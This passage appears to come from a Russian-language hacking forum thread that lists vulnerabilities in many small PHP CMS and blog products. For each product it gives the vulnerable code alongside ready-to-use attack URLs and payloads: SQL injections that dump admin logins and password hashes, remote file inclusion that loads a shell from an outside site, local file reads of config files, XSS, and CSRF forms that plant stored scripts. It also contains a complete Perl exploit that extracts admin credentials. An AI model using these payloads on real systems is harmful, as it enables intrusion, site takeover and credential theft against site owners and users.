...$strsql = "SELECT id, title,description,startpage FROM pages_t_details WHERE id=" . $strID;
$rst= $conclass->Execute ($strsql,$strError);...

Result:
http://localhost/basiccms/admin/pages/AddModifyinput.php?ID=9+union+Select+1,version%28% 29,3,4

Также уязвим Admin./Pages/AddModifyDelete.php
XSRF+SQL inj(права админа!)
...$strsql="DELETE FROM pages_t_details ";
$strsql.= " WHERE id=" .SQLSafeString($strID);...
Result:
http://localhost/basiccms/admin/pages/AddModifyInput.php?action=DEL&ID=1+or+%281,2%29=%28Select%20*%20from%20%28Select %20name_const%28version%28%29,1%29,name_const%28ve rsion%28%29,1%29%29x%29

ps еще можна было провести (в других файлах) XSRF на добавление пользователей, ... + SQL inj(права админа).

WebspotBlogging
Product : WebspotBlogging v 3.01

RFI, LFI
файлы в главной папке обращаются к файлам из папки inc в которых можно увидеть код - пример
inc/mainheader.inc.php

include($path."inc/global.php");
allow_url_include = On
rg = on
result :

http://x60unu/archives.php?path=http:/site/shell.txt?
http://x60unu/register.php?path=http://site/shell.txt?
http://x60unu/index.php?path=http://site/shell.txt?
http://x60unu/showpost.php?path=http://site/shell.txt?
http://x60unu/login.php?path=http://site/shell.txt?
http://x60unu/postcomment.php?path=http://site/shell.txt?
http://x60unu/showarchive.php?path=http://site/shell.txt?
http://x60unu/rss.php?path=http://site/shell.txt?

Ну и там же LFI

SQL Injection
Для всех скуль нужно mq=off
showpost.php
$sql = "SELECT * FROM blog WHERE pid = '".$_GET['id']."';";
$query = mysql_query($sql);
http://x60unu/showpost.php?id=1'+and+0+union+all+select+1,2,3,4, 5,6,7,8,9,10--+
showarchive.php
$monthdate = $_GET['monthdate'];
$sql = "SELECT * FROM blog WHERE month_date = '".$_GET['monthdate']."' ORDER BY date_time DESC;";
$query = mysql_query($sql);
http://x60unu/showarchive.php?monthdate='+and+0+union+all+select +1,2,3,4,5,6,7,8,9,10--+
зарегистрированным пользователям
posting/edit.php
$query = $database->query("SELECT * FROM blog WHERE pid = '".$_REQUEST['id']."'");
$post = $database->fetch_array($query);
http://x60unu/posting/edit.php?id=1'+and+0+union+all+select+1,2,3,versio n(),5,6,7,8,9,10--+
posting/editcomment.php
$query = $database->query("SELECT * FROM comments WHERE cid = '".$_GET['id']."'");
if($database->num_rows($query) < 1){
http://x60unu/posting/editcomment.php?id=1'+and+0+union+all+select+1,2,3 ,4,5--+
posting/comments.php
$query = $database->query("SELECT * FROM comments WHERE pid = '".$_REQUEST['id']."' ORDER BY date_time DESC");
if($database->num_rows($query) < 1){
http://x60unu/posting/comments.php?id=1'+and+0+union+all+select+1,2,3,4, 5--+
Blind SQL Injection
mysql = 5
mq = off
postcomment.php комментируем запись -->
$database->query("INSERT INTO comments (cid,uid,comment,date_time,pid) VALUES ('','".$_SESSION['uid']."','".$_POST['comment']."',NOW(),'".$_POST['pid']."')");
header("Location: showpost.php?id=".$_POST['pid']);
ob_end_flush();
users/index.php редактируем email -->


register.php - регистрация -->
$sql = "INSERT INTO users (`uid`,`username`,`password`,`admin`,`mod`,`email` ,`newsletter`) VALUES ('','".$_POST['username']."','".md5($_POST['password'])."',0,0,'".$_POST['email']."','".$_POST['newsletter']."')";
$query = $database->query($sql);
-->
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Active Xss
comments - комментируем записи "/><script>alert("xss");</script>
user cp - email "/><script>alert("xss");</script>
posting - "/><script>alert("xss");</script>

Free CMS Webcountry

Древний релиз! - но компания не дремлет!
Используеться mod_rewrite.
В index.php есть такой код:...ob_start();
$mod=$_GET["mod"];
if (!IsSet($mod)){include "./page/$main_page.php";}
else {include "./page/".$mod.".php";}
$contents=ob_get_contents();
ob_end_clean();......require("./tpl/$thema.tpl");...Переменная $thema определяеться в подключаемом файле c запроса.
Если переменную определить в подключаемом файле, например, не с запроса или с запроса после SQL inj, то расширение можна отбросить.
В БД ничего ценного! Пусть админко запаролена :).
В подключаемый файл тулим $thema=$_GET['thema']. И гетом передадим thema=../readme.txt%00, кроме mod.
То должно получиться типо такого: http://localhost/f/index.php?mod=../1.txt%00&thema=../readme.txt%00.
Если переменную $thema не определить, то результат не увидеть с первого инклуда - будет ошибка в фунции require, так как скрипт не выполниться! Как реализовать с proc думаю понятно.

Теперь пример инклуда с результату запроса после проведения SQL ing(или при!).
Подключаем файлик с /page,
допустим, news.php так как там парамтер id передаеться в запрос!...$query = "SELECT * FROM site WHERE id='".$_GET["id"]."';";
$result = mysql_query($query);
while($r=mysql_fetch_array($result))
{
$title=$r["title_page"];
$KeyWords_page=$r["KeyWords_page"];
$Description_page=$r["Description_page"];
$txt_page=$r["txt_page"];
$thema=$r["thema"];
echo "$txt_page";}... Имеем LFI с 6 поля:
http://localhost/f/index.php?mod=news&id=3%27+union+select+1,2,3,4,5,6,7,8--+
Warning: require(./tpl/6.tpl) [function.require]:
http://localhost/f/index.php?mod=news&id=3%27+union+select+1,2,3,4,5,%27../readme.txt%00%27,7,8--+
Недостаток при SQL inj в том, что надо mg=off так как id в запросе ...id='".$_GET["id"]."';...Так же SQL inj в /pages/index.php ...mysql_select_db ($db_name) or die ("Нет соединения с БД");
$query = "SELECT * FROM site WHERE id='".$_GET["id"]."';";
$result = mysql_query($query);...up
та й в принципе вектор атаки должен умещаться в рамки url , посему первый вариант не сработает, разве что ось win (при mg=on).
Еще надо сказать, что если rg=on, то $_GET масив тоже формируеться, не только глобальные и значение "магических" к фени!...

Тоесть, при rg=on имеем LFI вот так:
http://localhost/117/index.php?mod=1&thema=../readme.txt%00
http://localhost/117/index.php?mod=1&thema=../readme.txt[/]
http://localhost/117/index.php?mod=1&thema=../readme.txt[.]

ps /adm - админко незапаролена по умолчанию.

AntiSlaed CMS 4.1
index.php ...$name = (isset($_POST['name'])) ? ((isset($_POST['name'])) ? analyze($_POST['name']) : "") : ((isset($_GET['name'])) ? analyze($_GET['name']) : "");......$file = (isset($_POST['file'])) ? ((isset($_POST['file'])) ? analyze($_POST['file']) : "") : ((isset($_GET['file'])) ? analyze($_GET['file']) : "");
$file = ($file) ? $file : "index";......include("modules/".$name."/".$file.".php");...Теперь смотрим в модуль новости /modules/news/index.php.function news(){...
$scat = (isset($_GET['cat'])) ? $_GET['cat'] : 0;...
...list($cat_title, $cat_description) = $db->sql_fetchrow($db->sql_query("SELECT title, description FROM ".$prefix."_categories WHERE id='$scat'"));...
}...switch($op) {
default:
news();
break;...в ../index.php...$op = (isset($_POST['op'])) ? ((isset($_POST['op'])) ? analyze($_POST['op']) : "") : ((isset($_GET['op'])) ? analyze($_GET['op']) : "");...Можно было бы провести SQL inj если бы не файл functions/security.php начиная с 341 line, ех!

Ищем .:XSS:.

Поиск закончился успехом.
/modules/order/index.php
Обращаем внимание на $_POST['com']
function order() {
global $conf, $confor, $pagetitle, $bodytext, $stop;
$pagetitle = "".$conf['defis']." "._ORDER."";
$bodytext = $confor['text'];
if (is_user()) {
$userinfo = getusrinfo();
$mail = (isset($_POST['mail'])) ? $_POST['mail'] : $userinfo['user_email'];
} else {
$mail = (isset($_POST['mail'])) ? $_POST['mail'] : "";
}
$field = fields_save($_POST['field']);
head();
title(""._ORDER."");
if ($stop) warning($stop, "", "", 1);
open();
echo bb_decode($bodytext, "all");
close();
if ($confor['an']) {
open();
echo "<h2>"._OR_1."</h2><form method=\"post\" action=\"index.php?name=".$conf['name']."\" OnSubmit=\"ButtonDisable(this)\">"
."<div class=\"left\">"._OR_2." <font class=\"option\">*</font></div><div class=\"center\"><input type=\"text\" name=\"mail\" value=\"".$mail."\" maxlength=\"255\" size=\"65\" class=\"".$conf['style']."\"></div>"
."".fields_in($field, $conf['name']).""
."<div class=\"left\">"._OR_3."</div><div class=\"center\"><textarea name=\"com\" cols=\"65\" rows=\"5\" class=\"".$conf['style']."\">".$_POST['com']."</textarea></div>"
."".captcha_random().""
."<div class=\"button\"><input type=\"hidden\" name=\"op\" value=\"send\"><input type=\"submit\" value=\""._OR_4."\" class=\"fbutton\"></div></form>";
close();
} else {
warning(""._OR_5."", "", "", 2);
}
foot();
}...Функция order() вызываеться по умолчанию
...switch($op) {
default:
order();
break;...Result:
- формиуем код;
- заставляем админа послать пост-запрос (ну понятно что он должен быть авторизирован!).

Простой пример експлуатации:
<form action="http://anti/index.php?name=order">
<p><b>Каким браузером в основном пользуетесь:</b><Br>
<input type="radio" name="browser" value="ie"> Internet Explorer<Br>
<input type="radio" name="browser" value="opera"> Opera<Br>
<input type="radio" name="browser" value="firefox"> Firefox<Br>
</p>
<input type="hidden" name="com" VALUE="</textarea><script>alert(123)</script>">
<input type=submit value="Молодца"!">
</form>
up
В самом последнем релизе пофиксено!
Значение переменной $com и других проганяэться через:
# HTML and word filter
function text_filter($message, $type="") {
global $conf;
$message = is_array($message) ? fields_save($message) : $message;
if (intval($type) == 2) {
$message = htmlspecialchars(trim($message), ENT_QUOTES);
} else {
$message = strip_tags(urldecode($message));
$message = htmlspecialchars(trim($message), ENT_QUOTES);
}
if ($conf['censor'] && intval($type != 1)) {
$censor_l = explode(",", $conf['censor_l']);
foreach ($censor_l as $val) $message = preg_replace("#$val#i", $conf['censor_r'], $message);
}
return $message;
}

Sing CMS


скачать (http://sing-cms.ru/downloads/modules/base/)

В результате применения XSRF имеем активную XSS.

Подтверждения со стороны адинистратора на сохранение данных нет!

Уязвимо $_POST['content'] с многострочного поля!

Вот куски кода:

/admin/editpage.php
...$checkbottom = isset($_POST['showbottom']) ? " checked" : "";
$maintpl = listtpl("main", $_POST['maintpl']);
$name = cleaninput($_POST['name']);
$keywords = cleaninput($_POST['keywords']);
$description = cleaninput($_POST['description']);
$content = stripslash($_POST['content']);
if (isset($_POST['breaks'])) {
$linebreaks = " checked";
$xx = explode("?>", $content); $prevcontent = "";
foreach($xx as $val) {......else {
dbquery("INSERT INTO ".DBPREF."pages (name, keywords, description, content, settings, created) VALUES ('$name', '$keywords', '$description', '$content', '".serialize($pageset)."', '".time()."')");
redirect($_SERVER['SCRIPT_NAME']."?id=".mysql_insert_id()."&info=added");
}.../functions.php...function stripslash($text) {
if (ini_get('magic_quotes_gpc')) $text = stripslashes($text);
return $text;
}
function addslash($text) {
if (!ini_get('magic_quotes_gpc')) $text = addslashes(addslashes($text));
else $text = addslashes($text);
return $text;
}
function cleaninput($text) {
if (ini_get('magic_quotes_gpc')) $text = stripslashes($text);
$search = array("\"", "'", "\\", '\"', "\'", "<", ">", "&nbsp;");
$replace = array("&quot;", "'", "\", "&quot;", "'", "&lt;", "&gt;", " ");
$text = str_replace($search, $replace, $text);
$text = trim($text);
return $text;...Експлуатация:
<form action="http://localhost/sing/admin/editpage.php" method="post">
<p><b>Каким браузером в основном пользуетесь</b>
<Br> <input type="radio" name="browser" value="ie"> Internet Explorer
<Br> <input type="radio" name="browser" value="opera"> Opera
<Br> <input type="radio" name="browser" value="firefox"> Firefox<Br></p>
<input type="hidden" name="maintpl" VALUE="1">
<input type="hidden" name="name" VALUE="123">
<input type="hidden" name="content" VALUE="<script>alert(123)</script>">
<input type="hidden" name="save">
<input type=submit value="Молодца"!">
</form>Result:
id страницы, например 2.
в page.php?id=2 ...<div class="page"><script>alert(123)</script></div>...

CMS.link
/include/functions.php....function adds(&$el,$level=0) {
if (is_array($el)){
if (get_magic_quotes_gpc()) return;
foreach($el as $k=>$v)
adds($el[$k],$level+1);
}
else{
if (!get_magic_quotes_gpc()) $el = addslashes($el);
if (!$level) return $el;
}
}
...Через эту функцию не провести SQL inj

Улыбнул вот этот участок кода:...
if($site->getCommP())$method="";
switch($method)
{
case "print":
include $config['site_dir']."include/plugins/mop/print.plg";
break;
case "send":
include $config['site_dir']."include/plugins/mop/send.plg";
break;
case "comments":
include $config['site_dir']."include/plugins/mop/comments.plg";
break;
case "vote":
include $config['site_dir']."include/plugins/mop/vote.plg";
break;
case "dir":
include $config['site_dir']."include/plugins/mop/dir.plg";
break;
default:
$file=$config['site_dir']."templates/docs/".$site->getTemplate().".tpl";
if (!file_exists($file))
error_rep("Server","No such file or directory ($file)","404");
include $file;...XSS в include/plugins/mop/send.plg ...
if(!ereg(".+@.+\..+", $_POST['p_s_mail'])){
$p_s_error="{$lan[18]}<br>";
p_s_print_html($p_s_error);
}
elseif($_POST['p_s_yname']==""){
$p_s_error="{$lan[2]}<br>";
p_s_print_html($p_s_error);
}
elseif(!ereg(".+@.+\..+", $_POST['p_s_ymail'])){
$p_s_error="{$lan[1]}<br>";
p_s_print_html($p_s_error);
}
else{
mail(
$_POST['p_s_mail'],
$lan[19],
htmlspecialchars(stripslashes($p_s_mes)),
"From: {$_POST['p_s_ymail']}\n".
"Reply-To: {$_POST['p_s_yname']}\n");

echo "{$lan[17]} \"{$_POST['p_s_mail']}\".<br><br>";
}
.../include/langyage/russian.lng...$lan[17]="Публикация успешно отправлена по адресу";...
Тоесть, имеем пасивную XSS в поле E-mail друга (p_s_mail) + анонимная отправка писем.
Даные отправляються постом.
Чтоб сработала comm_permission=0 должно быть.
По умолчанию так и есть на 3-х страницах и при добавление новых также (если не изменить радиобатон).

Result:
http://cmslink/main/send
В поле E-mail друга:blabla@mail.ru<script>alert(123)</script>

Magneto <= v2.0
SQl-inj
Офф сайт:
http://www.userside.org.ua/magneto/

/magneto/main/config/admfunct.php

function requestdata($ps1)
{
if (isset($_REQUEST[$ps1])){$ps_requestdata=replacesymbol(trim($_REQUEST[$ps1]));} else {$ps_requestdata='';}
return $ps_requestdata;
}

/magneto/module/$module/kat.php


if ($ps_type=="delkat" || $ps_type=="editdopf" || $ps_type=="editdopf2" || $ps_type=="delsubkat" || $ps_type=="edit" || $ps_type=="edit2") dopverify("DO_KAT");

if ($ps_type=="editdopf") $ps_style="short";

if ($ps_type2!="") $ps_katname=getkatname($ps_type2);



if ($ps_type=="editdopf2"){
$ps_dopf1=requestdata('dopf1');
$ps_dopf2=requestdata('dopf2');
$ps_dopf3=requestdata('dopf3');
$ps_dopf4=requestdata('dopf4');
$ps_dopf5=requestdata('dopf5');
$rs_2=mysql_query("select * from tbl_dopf where KATCODE=".$ps_code,$conn1);
$rs=mysql_fetch_array($rs_2);
if ($rs['CODE']==''){
$ps_constr="insert into tbl_dopf (KATCODE,DOPF1,DOPF2,DOPF3,DOPF4,DOPF5) values (".$ps_code.",'".$ps_dopf1."','".$ps_dopf2."','".$ps_dopf3."','".$ps_dopf4."','".$ps_dopf5."')";
}else{
$ps_constr="update tbl_dopf set DOPF1='".$ps_dopf1."',DOPF2='".$ps_dopf2."',DOPF3='".$ps_dopf3."',DOPF4='".$ps_dopf4."',DOPF5='".$ps_dopf5."' where CODE=".$rs['CODE'];
}
mysql_free_result($rs_2);
$rs_s2=mysql_query($ps_constr,$conn1);
goback();
}

И дальше в таком же духе.
Експлуатация:

[patch]/kat.php?type=showkat&type2=-1+union+select+1,2,3,4--

santafox 1.1


http://www.santafox.ru/ (http://www.santafox.ru/)
Тестировалось на фаерфокс 3.5.9

Пасивная XSS в поле поиска.

Result:
http://sa/search.html?search=%3Cscript%3Ealert%28123%29%3C%2 Fscript%3E&x=0&y=0

Пока чихлюсь с кодом, немогу найти где этот участок кода (использ.ооп), так что сори :)
ps на сайте тоже работает!

up
У нас есть активная XSS в коментах , но експлуатация сводиться к миниму, так как сначала просматривает админ. Если ступит и пометит: "Комментарий активен", то активка у двох полях.
Есть и глобальная опция Премодерация.

Blind SQL inj
Кстати, ошибка в этой функции, строка 4279, когда кавычку впихнуть при mg=off!
/modules/catalog/catalog.class.php
... private function get_item($id)
{
global $kernel;
$res = false;
$query = 'SELECT * FROM `'.PREFIX.'_catalog_'.$kernel->pub_module_id_get().'_items` WHERE `id` ='.$id.' LIMIT 1';
$result = $kernel->runSQL($query);
if ($row = mysql_fetch_assoc($result))
$res = $row;
mysql_free_result($result);
return $res;
}...Короче єтот модуль уязвим , чтоб не лезть в дебри покажу просто експлуатацию слепой иньекции в числовом контексте, думаю что есть в каком то модуле и принтабельная скуль. Будет время - поковыряю.

Result:
1) http://sa/catalog.html?cid=11+and+5=@@version
ps также парамтер дырявый itemid (гет этому скрипту!)

пасс в незашыфрованом виде :)

id,login,pass,full_name,lang,code_page,enabled
Но префикс таблицы есть, не помню при установке по дефлоту:
у меня таблица sf_admin.

админко - /admin

У кого есть желание - присоединяйтесь :)

Multiengine CMS 0.9.3
LFI
/multiengine/multiengine.php//error_reporting(0);
//header("Last-Modified: ".gmstrftime("%a, %d %b %Y %H:%M:%S", strtotime(gmdate("D, d M Y 0:00:01"))-86400+date("j")*100)." GMT");
define("THIS_SITE", "http://".$_SERVER['HTTP_HOST']."/", true);
define("CURR_URL", "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], true);

require_once("$enginedir/functions.php");
// Подключаем класс кэша
require_once("$enginedir/cache.class.php");

// Фильтрация входящих данных
if(isset($_GET['mod'])){
$mod= QueryFilter($_GET['mod']);
}
if(isset($_GET['cat'])){
$cat= '/'.QueryFilter($_GET['cat']);
}
if($mod.$cat.$_GET['page']=='robots.txt'){
header('Content-Type: text/plain');
if(!@readfile('robots.txt')){
print "User-Agent: *\r\nDisallow:";
}
exit;
}
if(isset($_GET['page'])){
if($_GET['page']=='index'.$url_ext){
$to= 'index.php?';
if(isset($mod)){
$to.= "mod=$mod";
if(isset($_GET['cat'])){
$to.= "&cat=".$_GET['cat'];
}
}
elseif(isset($_GET['cat'])){
$to.= "cat=".$_GET['cat'];
}
header('HTTP/1.1 301 Moved Permanently');
header('Location: '.UrlRewrite(THIS_SITE.$to));
exit;
}
elseif(strstr($_GET['page'], $url_ext)){
$page= "/".QueryFilter(preg_replace('"(.+)'.$url_ext.'"', '$1', $_GET['page']));
}
else{
Error404();
}
}
else{
$page= "/index";
}

// Подключение модулей
if(isset($mod)){
if(is_file("$enginedir/mods/$mod/mod.php")){
require_once("$enginedir/mods/$mod/mod.php");
}
else{
$cat= "/$mod$cat";
if(is_file("$d_base/pages$cat$page.$db_ext")){
require_once("$enginedir/pages.php");
}
else{
Error404();
}
}
}
else{
require_once("$enginedir/pages.php");
}...target: index.php

например, в куки тулим:
; mod=../../readme.txt%00


Запрос:
Host=multiengine_cms
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=ru,en-us;q=0.7,en;q=0.3
Accept-Encoding=gzip,deflate
Accept-Charset=windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Connection=keep-alive
Cookie=ffb4935b1bb5d18a2c0f862c02295821=fc3c3d1565 f5a9aa318645a642382fc9; mod=../../readme.txt%00
Cache-Control=max-age=0

Ответ:
Status=OK - 200
Date=Sun, 18 Apr 2010 22:14:24 GMT
Server=Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4
X-Powered-By=PHP/5.2.4
Content-Length=2776
Keep-Alive=timeout=5, max=100
Connection=Keep-Alive
Content-Type=text/html; charset=windows-1251

Читалка
(достаем логин и пасс админа)
посылаем куки: ; cat=/../../multiengine/mods/admin/config.php%00

target: index.php

/multiengine/pages...
if(is_file("$d_base/pages$cat$page.$db_ext")){
$fpage= file("$d_base/pages$cat$page.$db_ext");
$pagetitle= array_shift($fpage);
$content= implode("\r\n", $fpage);...Поубирал с кода переводы и пробелы чтоб было видно!
<?</h1><div class="pagepath"><a href="http://multiengine_cms/">Имя сайта краткое</a> / <a href="http://multiengine_cms/../"></a> / <a href="http://multiengine_cms/../../multiengine/"></a> / <a href="http://multiengine_cms/../../multiengine/mods/admin/config.php_/"></a></div>
$admlogin= 'admin';$admpass= '21232f297a57a5a743894a0e4a801fc3';
?></td>
админко - /admin

Условие:
register_globals = OnJokester:
я не пойму, если зависимость register_globals = On то почему-бы сразу не RFI $enginedir ?
Я написал target - index.php чтоб реализовать то, что написано выше!

RFI не получиться , есть причины:

1) если target - multiengine/multiengine.php, то есть .htaccess
Deny from all2) если target - index.php

index.php
$enginedir= 'multiengine';
require_once("$enginedir/config.php");
$delimiter= '/';
$sitename= 'Имя сайта краткое';
$title= 'Заголовок сайта';
$description= 'Описание сайта';
require_once("$enginedir/multiengine.php");ps
mg=off, так как замена нулевого байта в is_file() не сработает.
Извинения за то, что код не полностю выложыл!

Продукт:Maian Weblog v4.0
Требования: mq = off
SQLi в /index.php

....
// Get blog data..
$q_blog = mysql_query("SELECT * FROM ".$database['prefix']."blogs
WHERE id = '$b_post'
LIMIT 1
") or die(mysql_error());
...

эксплуатация:

/index.php?cmd=blog&post=3'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

SQLi в admin/data_files/favourites.php

// Only load data if in edit mode..
if (isset($_GET['edit']))
{
$EDIT = mysql_fetch_object(mysql_query("SELECT * FROM ".$database['prefix']."favourites
WHERE id = '".$_GET['edit']."'
LIMIT 1
")) or die(mysql_error());
}

эксплуатация:

admin/index.php?cmd=favourites&edit=-1'+union+select+1,2,version()--+

SQLi в admin/data_files/edit.php

$q_edit = mysql_query("SELECT * FROM ".$database['prefix']."blogs
WHERE id = '".$_GET['id']."'
LIMIT 1
") or die(mysql_error());
$EDIT = mysql_fetch_object($q_edit);

эксплуатация:

admin/index.php?cmd=edit&id=-3'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--+

Также еще работает одни из xss найденная здесь http://seclists.org/bugtraq/2008/May/30

admin/index.php?cmd=search&search=1&area=blogs&keywords="><script>alert(/xss/)</script>

PS там как минимум есть еще скуля в update и delete.

ignition 1.2

XSS
/template.php...if ($twitter) {
echo('<strong><a href="http://twitter.com/'.$twitter.'">What\'s going on?</a></strong><br />');
include ('stuff/twitter.php');
echo('<br /><br />'); }
if ($identica) {
echo('<strong><a href="http://identi.ca/'.$identica.'">What\'s going on?</a></strong><br />');
include ('stuff/identica.php');
echo('<br /><br />'); }
if ($book) echo ('<strong>Currently reading:</strong><br />'.$book.'<br /><br />');
if ($game) echo ('<strong>Currently playing:</strong><br />'.$game);
echo('</div>..."Переменные нигде не определяються!

Результат:
http://localhost/ignition_1.2/index/main.php?book=1%3Cscript%3Ealert%28123%29%3C/script%3E

Условие:
rg=on

LFI
view.php...session_start();
require ('settings.php');
$blog = $_GET['blog'];
if (file_exists('posts/'.$_GET['blog'].'.txt')) {
include ('posts/'.$_GET['blog'].'.txt');
}else{
die(require('404.php')); }
iheader($title);...Результат:
http://localhost/ignition_1.2/view.php?blog=../../favicon.ico%00

Условие:
mg=off

Аналогично
comment.php
...<?php
session_start();
require ('settings.php');
include ('posts/'.$_GET['blog'].'.txt');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"...Тут mg всеравно!

Результат:
http://localhost/ignition_1.2/comment.php?blog=../../favicon.ico%00
Или замену нул-байта.
На PHP Version 5.3.1 надо mg=off

К посту #33 (https://forum.antichat.ru/showpost.php?p=2032948&postcount=353)


#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "################################################## ############\n";
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "################################################## ############\n";
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
print "\n userlevel 9 = SuperAdmin ";
print "\n pass = md5($pass)";
if (@ARGV < 2)
{
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,use rname,0x3a,password,0x3a,email,0x3a,userlevel,0x3a 3a3a),4,5,6,7+from+users+";
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
print "\n[+] Admin email: $4";
print "\n[+] Admin userlevel: $5";
}else{
print "\n My name is Fail, Epic Fail... \n"
}


pastebin.com (http://pastebin.com/HDBXNHbe)

brewblogger 2.2.0

Blind SQL inj
index.php
require_once ('Connections/config.php');
require ('includes/authentication_nav.inc.php'); session_start();
include ('includes/db_connect_universal.inc.php');.../includes/authentication_nav.inc.php
mysql_select_db($database_brewing, $brewing);
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);.../includes/db_connect_universal.inc.php
// Get server's PHP version
$phpVersion = phpversion();
//echo $phpVersion;

$currentPage = "http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
if (!empty($_SERVER["QUERY_STRING"])) $currentPage .= "?".$_SERVER['QUERY_STRING'];
$loginUsername = $_SESSION["loginUsername"];target:index.php

Условие:
rg=on;
mg=off.

Опять в куки, например, тулим:
; loginUsername=h' and (select 1 from (select count(0),concat(version(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#

Пароли и логины в таблице users:
user_name password

Рабочий запрос (проверил на 5.1.40-community):
; loginUsername=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#

Blind SQL inj
/includes/db_connect_universal.inc.php
// User Info
mysql_select_db($database_brewing, $brewing);
$query_user5 = sprintf("SELECT * FROM users WHERE user_name = '%s'", $filter);
$user5 = mysql_query($query_user5, $brewing) or die(mysql_error());
$row_user5 = mysql_fetch_assoc($user5);
$totalRows_user5 = mysql_num_rows($user5);...need:
rg=on;
mg=off

target:index.php

Result:
в куки, напр.:
; filter=h' and (select 1 from (select count(0),concat_ws(0x3a,(select user_name from users limit 0,1),(select password from users limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#

blind SQL inj (в order by)
includes/db_connect_universal.inc.php
...
if ($page == "brewBlogList") {
if ($filter == "all") {
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM brewing ORDER BY %s %s", $sort, $dir);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
}......if ($page == "brewBlogList") $dir = "DESC";
else $dir = "ASC";
if (isset($_GET['dir'])) {
$dir = (get_magic_quotes_gpc()) ? $_GET['dir'] : addslashes($_GET['dir']);......$page = $row_pref['home'];
if (isset($_GET['page'])) {
$page = (get_magic_quotes_gpc()) ? $_GET['page'] : addslashes($_GET['page']);
}......elseif ($page == "brewBlogList") $sort = "brewDate";...need only:
rg=on :)

Reslult:
http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=[SQL]

http://localhost/brewblogger2.2.0/index.php?page=brewBlogList&dir=,%28select%201%20from%20%28select%20count%280% 29,concat_ws%280x3a,%28select%20user_name%20from%2 0users%20limit%200,1%29,%28select%20password%20fro m%20users%20limit%200,1%29,floor%28rand%280%29*2%2 9%29%20from%20%28select%201%20union%20select%202%2 0union%20select%203%29x%20group%20by%202%29a%29#
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 'group_key'Крутил как блинд, походу принтабельных нет(кажысь)!
Дальше по тексту есть иньекции при rg=on!

SQL inj
УРЯ! :)
Поиск принтабельной скули закнончился успехом!

target: our_site/sections/entry.inc.php?action=hack

/sections/entry.inc.php
Вот куски:
...if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
} else
$style = $_POST['style'];......mysql_select_db($database_brewing, $brewing);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
$style1 = mysql_query($query_style1, $brewing) or die(mysql_error());
$row_style1 = mysql_fetch_assoc($style1);
$totalRows_style1 = mysql_num_rows($style1);...need:
mg=off

Result:
<form action="http://localhost/brewblogger2.2.0/sections/entry.inc.php?action=hack" method="post">
<input type="text" name="style" value="' union select 1,user_name,password,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17 from users-- ">
<input type=submit value="ok">
</form>

ps
иследовал не полностю!

kure 0.6.2
Читалка
/config.php
...$config['adminpass'] = "21232f297a57a5a743894a0e4a801fc3";.../index.php
.../***** VIEWPOST/VIEWDOC *****/
elseif(isset($_GET['post']) || isset($_GET['doc'])) { // if a post/doc has been requested
if(isset($_GET['post'])) {
$type = "post";
$filename = $_GET['post'];
} else {
$type = "doc";
$filename = $_GET['doc'];
}
plug($type, "top");
if(!file_exists($type . "s/" . $filename . ".txt")) {
print("The requested file <tt>" . $type . "s/" . $filename . ".txt</tt> does not exist.\n");
} else {
$file = $type . "s/" . $filename . ".txt";
$title = $file;
$title = str_replace($type . "s/", "", $title);
$title = str_replace(".txt", "", $title);
$uftitle = $title;
$title = str_replace("_", " ", $title);
$content = str_replace("\n", "<br>\n", file_get_contents($file));
print("<table align=\"center\" width=\"90%\"><tr>\n");
print("<td width=\"100%\">\n");
print("<a class=\"blog_title\" href=\"?" . $type . "=" . $uftitle . "\" name=\"" . $title . "\">" . $title . "</a>\n");
plug($type, "title_after");
print("<br>\n");
if(($type == "doc" && $config['docdates'] == true) || $type == "post") {
print("<span class=\"blog_date\">" . date("F jS, Y", filemtime($file)) . "</span>\n");
plug($type, "date_after");
print("<br>\n");
}
print("</td></tr>\n");
print("<tr><td width=\"100%\"><br>\n");
print("<span class=\"blog_content\">\n" . $content . "\n</span>");
plug($type, "body_after");
